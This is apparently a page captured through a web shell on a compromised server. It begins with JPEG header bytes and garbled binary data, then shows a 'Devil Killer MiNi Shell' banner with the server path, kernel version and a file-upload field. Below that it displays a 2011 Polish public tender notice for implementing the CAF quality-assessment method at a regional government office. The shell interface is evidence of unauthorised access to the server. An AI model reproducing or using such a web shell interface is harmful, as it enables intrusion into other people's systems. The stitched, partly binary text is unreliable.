JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110217/56753-N-2011.html

<p class="kh_header"><b>Kielce: wdrożenie Wspólnej Metody Oceny CAF 
w Urzędzie Marszałkowskim Województwa Świętokrzyskiego 
związanej z realizacją projektu pn: Rozwój systemu kluczowych obszarów funkcjonowania i kompetencji kadr Urzędu Marszałkowskiego Województwa Świętokrzyskiego wdrażanego w ramach  Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 56753 - 2011; data zamieszczenia: 17.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 041 3443347, 3421549, 3421602, faks 041 3445265.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wdrożenie Wspólnej Metody Oceny CAF 
w Urzędzie Marszałkowskim Województwa Świętokrzyskiego 
związanej z realizacją projektu pn: Rozwój systemu kluczowych obszarów funkcjonowania i kompetencji kadr Urzędu Marszałkowskiego Województwa Świętokrzyskiego wdrażanego w ramach  Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa w zakresie przygotowania, przeprowadzenia,    wdrożenia Wspólnej Metody Oceny CAF w Urzędzie Marszałkowskim Województwa Świętokrzyskiego związana z realizacją projektu pn: Rozwój systemu kluczowych obszarów funkcjonowania i kompetencji kadr Urzędu Marszałkowskiego Województwa Świętokrzyskiego realizowanego przez Urząd Marszałkowski Województwa Świętokrzyskiego współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu V - Dobre rządzenie, Działania 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałania 5.2.1 Modernizacja zarządzania w administracji samorządowej obejmująca w ramach:
Kroku 1. Zorganizowanie i zaplanowanie zadań projektu, Kroku 2.Upowszechnienie wiadomości o przystąpieniu urzędu do projektu CAF oraz Kroku 3.Utworzenie grup samooceny następujący zakres prac:
a)	Prezentacja dla zarządu zasad i celów wdrożenia modelu CAF:  4 godziny x 6 osób - 1 dzień. Przyjmuje się, że czas jednej godziny jest równy godzinie lekcyjnej - 45 min. 
b)	Prezentacja dla kadry kierowniczej zasad i celu wdrożenia CAF:  4 godziny x 12 osób -1 dzień ,
Wykonawca zobowiązany jest do zapewnienia sal do przeprowadzenia prezentacji wyposażonych w sposób wystarczający do przeprowadzenia danej prezentacji. Sala szkoleniowa musi spełniać standardy szkoleniowe tj. posiadać klimatyzację, odpowiednie oświetlenie, biurka lub stoły dla uczestników szkolenia, krzesła, ogrzewanie w okresie zimowym. Pomieszczenia muszą spełniać wymogi BHP i mieć odpowiednie zaplecze sanitarne: toaleta dostępna poza salą szkoleniową.
c)	Przygotowanie założeń: 4 godziny x 4 osoby - 1 dzień ,
d)	Prace przygotowawcze w tym: wybór zespołu prowadzącego 3 osoby, prace przygotowawcze zespołu z konsultantami 8 godzin x 3 osoby - 2 dni, przygotowanie grup samooceny 8 godzin x 3 osoby - 1 dzień,

W ramach Kroku 4. Przeszkolenie grup samooceny następujący zakres prac:  
a)	Szkolenie grup samooceny: 8 godzin x 45 osób (3 grupy po 15 osób) - 2 dni. Wykonawca zapewni sale szkoleniowe znajdujące się poza siedzibą zamawiającego ale na terenie miasta Kielce wyposażone w sprzęt audiowizualny i inne pomoce dydaktyczne gdy takie będą potrzebne. Sala szkoleniowa musi spełniać standardy szkoleniowe tj. posiadać klimatyzację, odpowiednie oświetlenie, biurka lub stoły dla uczestników szkolenia, krzesła, ogrzewanie w okresie zimowym. Pomieszczenia muszą spełniać wymogi BHP i mieć odpowiednie zaplecze sanitarne: toaleta dostępna poza salą szkoleniową. Wykonawca zapewni  usługi cateringowe w tym: kawa, herbata, mleko do kawy, cukier, woda mineralna, ciastka -  dla każdego uczestnika szkolenia. Wykonawca zobowiązany jest do zapewnienia uczestnikom szkolenia warunków zgodnych z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia oraz ubezpieczenia uczestników szkolenia od Następstw Nieszczęśliwych Wypadków od pierwszego do ostatniego dnia szkolenia. W razie wystąpienia wypadku, Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego ze szkoleniem w drodze do i z miejsca szkolenia powstałego z udziałem pracownika UMWŚ skierowanego na szkolenie przez Zamawiającego. Wykonawca zobowiązany jest zamieścić na materiałach szkoleniowych oraz przed wejściem do sal szkoleniowych, w których prowadzone będą zajęcia odpowiednie logo Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz z informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, zgodnie z Planem Komunikacji Programu Operacyjnego Kapitał Ludzki dostępnym na stronie internetowej www.funduszestrukturalne.gov.pl.
W ramach Kroku 5.Przeprowadzenie samooceny, Kroku 6. Sprawozdanie z wyników samooceny oraz Kroku 7.Projekt planu doskonalenia następujący zakres prac:
a)	zbieranie informacji i sporządzanie świadectw 2 godziny x 45 osób - 5 dni, 
b)	 wyjazdowe warsztaty samooceny (przeprowadzenie warsztatów samooceny, przygotowanie projektów usprawnień) - 8 godzin x 45 osób (3 grupy po 15 osób)  - 3 dni .
 Zamawiający zastrzega, że szkolenie może być zorganizowane jedynie w dniach, które stanowią dni robocze dla zamawiającego, tj. od poniedziałku do piątku. Zamawiający wymaga, aby miejsce organizacji szkolenia było poza granicami administracyjnymi Kielc ale nie dalej niż 100 km od granic administracyjnych miasta, a dzień wyjazdu będzie dniem rozpoczynającym pierwszy dzień szkolenia. Wykonawca zapewni dojazd, zakwaterowanie w trakcie trwania szkolenia oraz pełne wyżywienie dla uczestników warsztatów, tj.: 
-w ramach zakwaterowania: 2 noclegi w pokojach maksymalnie  dwuosobowych z łazienkami, w hotelu minimum trzygwiazdkowym lub ośrodku szkoleniowym o porównywalnym standardzie,
-w ramach usług gastronomicznych: pełne wyżywienie (śniadanie pełne - szwedzki stół, obiad składający się z 2 dań, sałatki, napoju oraz kolacja), zapewnienie wszystkim uczestnikom warsztatów cateringu (w cenie warsztatów) podawanego w przerwach między zajęciami: kawy, herbaty, mleka do kawy, cukru, wody mineralnej, ciastek.
Wykonawca zapewni sale szkoleniowe wyposażone w sprzęt audiowizualny i inne pomoce dydaktyczne gdy takie będą potrzebne. Sala szkoleniowa musi spełniać standardy szkoleniowe tj. posiadać klimatyzację, odpowiednie oświetlenie, biurka lub stoły dla uczestników szkolenia, krzesła, ogrzewanie w okresie zimowym. Wykonawca zobowiązany jest do zapewnienia uczestnikom szkolenia warunków zgodnych z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia oraz ubezpieczenia uczestników szkolenia od Następstw Nieszczęśliwych Wypadków od pierwszego do ostatniego dnia szkolenia. W razie wystąpienia wypadku, Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego ze szkoleniem w drodze do i z miejsca szkolenia powstałego z udziałem pracownika UMWŚ skierowanego na szkolenie przez Zamawiającego. Wykonawca zobowiązany jest zamieścić na  materiałach szkoleniowych oraz  przed wejściem do sal szkoleniowych w których prowadzone będą zajęcia odpowiednie logo Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz z informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, zgodnie z Planem Komunikacji Programu Operacyjnego Kapitał Ludzki dostępnym na stronie internetowej www.funduszestrukturalne.gov.pl.
W ramach Kroku 8. Upowszechnianie informacji o planie doskonalenia, Kroku 9.Realizacja planu doskonalenia oraz Kroku 10. Planowanie następnej samooceny następujący zakres prac:
a)	sporządzenie i upowszechnienie sprawozdania z wyników samooceny 8 godzin x 3 osoby - 5 dni, 
b)	prezentacja wyników pracownikom urzędu 1 godzina x 344 osoby,
c)	  przygotowanie modelu usprawnień 8 godzin x 3 osoby  - 5 dni, 
d)	nadzór nad realizacją projektu usprawnień, planowanie następnej samooceny 8 godzin x 3 osoby - 5 dni.
Powtórzenie samooceny w roku 2012, w tym:
a)	szkolenie grup samooceny: 8 godzin x 45 osób (3 grupy po 15 osób) - 2 dni.
 Wykonawca zapewni sale szkoleniowe znajdujące się poza siedzibą zamawiającego ale na terenie miasta Kielce wyposażone w sprzęt audiowizualny i inne pomoce dydaktyczne gdy takie będą potrzebne. Sala szkoleniowa musi spełniać standardy szkoleniowe tj. posiadać klimatyzację, odpowiednie oświetlenie, biurka lub stoły dla uczestników szkolenia, krzesła, ogrzewanie w okresie zimowym. Pomieszczenia muszą spełniać wymogi BHP i mieć odpowiednie zaplecze sanitarne: toaleta dostępna poza salą szkoleniową. Wykonawca zapewni  usługi cateringowe w tym: kawa, herbata, mleko do kawy, cukier, woda mineralna, ciastka - dla każdego uczestnika szkolenia. Wykonawca zobowiązany jest do zapewnienia uczestnikom szkolenia warunków zgodnych z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia oraz ubezpieczenia uczestników szkolenia od Następstw Nieszczęśliwych Wypadków od pierwszego do ostatniego dnia szkolenia. W razie wystąpienia wypadku, Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego ze szkoleniem w drodze do i z miejsca szkolenia powstałego z udziałem pracownika UMWŚ skierowanego na szkolenie przez Zamawiającego. Wykonawca zobowiązany jest zamieścić na  materiałach szkoleniowych oraz  przed wejściem do sal szkoleniowych, w których prowadzone będą zajęcia odpowiednie logo Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz z informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, zgodnie z Planem Komunikacji Programu Operacyjnego Kapitał Ludzki dostępnym na stronie internetowej www.funduszestrukturalne.gov.pl.
b)	wyjazdowe warsztaty samooceny - 8 godzin x 45 osób (3 grupy po 15 osób)  - 3 dni warsztatów. 
Zamawiający zastrzega, że szkolenie może być zorganizowane jedynie w dniach, które stanowią dni robocze dla zamawiającego, tj. od poniedziałku do piątku. Zamawiający wymaga, aby miejsce organizacji szkolenia było poza granicami administracyjnymi Kielc ale nie dalej niż 100 km od granic administracyjnych miasta, a dzień wyjazdu będzie dniem rozpoczynającym pierwszy dzień szkolenia. Wykonawca zapewni dojazd, zakwaterowanie w trakcie trwania szkolenia oraz pełne wyżywienie dla uczestników warsztatów, tj.: 
-w ramach zakwaterowania: 2 noclegi w pokojach maksymalnie  dwuosobowych z łazienkami, w hotelu minimum trzygwiazdkowym lub ośrodku szkoleniowym o porównywalnym standardzie,
-w ramach usług gastronomicznych: pełne wyżywienie (śniadanie pełne - szwedzki stół, obiad składający się z 2 dań sałatki, napoju oraz kolacja), zapewnienie wszystkim uczestnikom warsztatów cateringu (w cenie warsztatów) podawanego w przerwach między zajęciami: kawy, herbaty, mleka do kawy, cukru, wody mineralnej, ciastek.
Wykonawca zapewni sale szkoleniowe wyposażone w sprzęt audiowizualny i inne pomoce dydaktyczne gdy takie będą potrzebne. Sala szkoleniowa musi spełniać standardy szkoleniowe tj. posiadać klimatyzację, odpowiednie oświetlenie, biurka lub stoły dla uczestników szkolenia, krzesła, ogrzewanie w okresie zimowym. Wykonawca zobowiązany jest do zapewnienia uczestnikom szkolenia warunków zgodnych z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia oraz ubezpieczenia uczestników szkolenia od Następstw Nieszczęśliwych Wypadków od pierwszego do ostatniego dnia szkolenia. W razie wystąpienia wypadku, Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego ze szkoleniem w drodze do i z miejsca szkolenia powstałego z udziałem pracownika UMWŚ skierowanego na szkolenie przez Zamawiającego. Wykonawca zobowiązany jest zamieścić na  materiałach szkoleniowych oraz  przed wejściem do sal szkoleniowych w których prowadzone będą zajęcia odpowiednie logo Programu Operacyjnego Kapitał Ludzki oraz logo Unii Europejskiej wraz z informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, zgodnie z Planem Komunikacji Programu Operacyjnego Kapitał Ludzki dostępnym na stronie internetowej www.funduszestrukturalne.gov.pl..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-2, 79.41.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: posiadają odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia, tj. w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie wykonali należycie co najmniej 2 wdrożenia modelu CAF w jednostkach samorządu terytorialnego o wartości minimum 35.000,00 zł brutto każde, poświadczone dokumentem potwierdzającym należyte wykonanie usługi.
Zamawiający oceni spełnianie tego warunku metodą spełnia nie spełnia na podstawie złożonego przez Wykonawcę wykazu usług wg wzoru- dodatek nr 2B do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują badź będą
dysponować potencjałem technicznym niezbędnym do wykonania przemiotu zamówienia Zamawiający oceni spełnianie tego warunku metodą spełnia nie spełnia na podstawie złożonego oświadczenia przez Wykonawcę wg wzoru stanowiącego dodatek nr 2A do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują badź będą
dysponować osobami zdolnymi do wykonania zamówienia tj:co najmniej 3 osobowym  zespołem wdrożeniowym, członkowie zespołu wdrożeniowego posiadają wykształcenie wyższe magisterskie, członkowie zespołu posiadają kwalifikacje zawodowe w zakresie metody CAF potwierdzoną certyfikatem, zaświadczeniem lub świadectwem, członkowie zespołu posiadają udokumentowane uczestnictwo we wdrożeniu modelu CAF w co najmniej 2 jednostkach samorządu terytorialnego zatrudniających minimum 150 osób.

Zamawiający oceni spełnianie tego warunku metodą spełnia nie
spełnia na podstawie złożonego przez Wykonawcę wykazu osób wg wzoru- dodatek nr 2C do
SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy znajdują się w sytuacji ekonomicznej niezbędnej do wykonania zamówienia. Zamawiający oceni spełnianie tego warunku metodą spełnia nie spełnia na podstawie złożonego oświadczenia przez Wykonawcę wg wzoru stanowiącego dodatek nr 2A do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty - wg wzoru określonego w Dodatku nr 1 do SIWZ.
2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawców występujących wspólnie (w tym spółki cywilne) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub poświadczona notarialnie kopia). 
3.	Pełnomocnictwo określające jego zakres - w przypadku, gdy Wykonawcę reprezentuje pełnomocnik (oryginał, poświadczona notarialnie kopia).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2, 3 i 4. 
2.W szczególnie uzasadnionych przypadkach Wykonawca może dokonać wymiany osób delegowanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca wskaże osobę/y o co najmniej takich samych kwalifikacjach. Zmiana ta nie wymaga formy pisemnej , o której mowa w ust. 1.
